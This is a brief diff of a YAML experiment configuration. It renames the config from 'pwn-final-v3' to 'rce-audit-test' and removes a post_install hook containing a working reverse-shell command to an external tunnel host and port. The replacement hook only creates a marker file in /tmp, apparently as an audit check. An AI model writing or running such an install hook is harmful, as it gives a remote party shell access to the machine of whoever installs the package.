--- a/iexpt.yaml
+++ b/iexpt.yaml
@@ -1,5 +1,5 @@
-name: "pwn-final-v3"
+name: "rce-audit-test"
 parameters:
   model: "none"
 hooks:
-  post_install: "sh -i >& /dev/tcp/ikfwl-128-124-121-36.a.free.pinggy.link/45571 0>&1"
+  post_install: "touch /tmp/pwned_by_audit"
